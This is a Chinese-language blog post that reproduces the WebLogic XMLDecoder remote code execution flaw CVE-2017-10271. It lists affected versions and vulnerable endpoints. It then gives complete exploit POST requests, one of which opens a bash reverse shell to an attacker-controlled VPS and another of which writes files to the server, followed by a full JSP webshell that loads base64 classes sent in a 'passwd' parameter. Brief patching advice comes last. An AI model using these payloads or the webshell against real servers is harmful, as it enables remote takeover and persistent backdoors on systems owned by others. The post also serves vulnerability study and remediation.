weblogic RCE CVE-2017-10271

weblogic
发布日期:   2021-11-06
更新日期:   2021-11-06
文章字数:   1.1k
阅读时长:   6 分
阅读次数:  

weblogic RCE CVE-2017-10271

成因

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令

影响版本

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.1.0

WebLogic 12.2.1.2.0

复现

访问7001端口

image-20211106101703971

1
2
3
4
5
6
Error 404--Not Found
From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:
10.4.5 404 Not Found
The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent.

If the server does not wish to make this information available to the client, the status code 403 (Forbidden) can be used instead. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address.

初步判断

访问ip:7001/wls-wsat/CoordinatorPortType11

image-20211106102141254

出现上图则可能存在漏洞

其他可用url

1
2
3
4
5
6
7
8
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

nc监听端口,构造post包测试,反弹shell

一台vps开启nc进行监听

nc -lvp 21

post包构造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 靶机:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 635

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/监听端口的ip/21 0>&1</string> 
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

这里反弹shell的语句要进行HTMLencode编码,避免解析HTML时出现格式错误

image-20211106110406381

访问:http://your-ip:7001/bea_wls_internal/test.jsp
写入webshell的POC
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.txt写文件。
文件名称为xxxx文件内容为xxxx
成功发送请求之后服务器会返回 500 status code。
需要注意的地方是头部必须加上Content-Type: text/xml请求会出错。

反弹shell成功获得root权限

image-20211106110829405

写入一句话木马

构造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 靶机ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

但一开始在burp中并没有发包成功

image-20211106125112507

访问ip:7001/bea_wls_internal/test.jsp

image-20211106125213781

构造jsp一句话马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

连接密码为passwd

连接路径为/bea_wls_internal/ma.jsp

image-20211106131818934

image-20211106131527000

image-20211106131957136

修复

  1. 下载相关补丁http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
  2. 根据实际环境路径,删除weblogicwls-wsat组件;删除相关文件后重启weblogic,保证访问wls-wsat/ 提示404错误

参考文章

Weblogic(CVE-2017-10271)漏洞复现

WebLogic(CVE-2017-10271)

【研究】weblogic漏洞系列XMLDecoder 反序列化漏洞(CVE-2017-10271)

文章作者: l0odrd
文章链接: https://King10280.github.io/2021/11/06/weblogic-CVE-2017-10271/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 l0odrd !
weblogic
  目录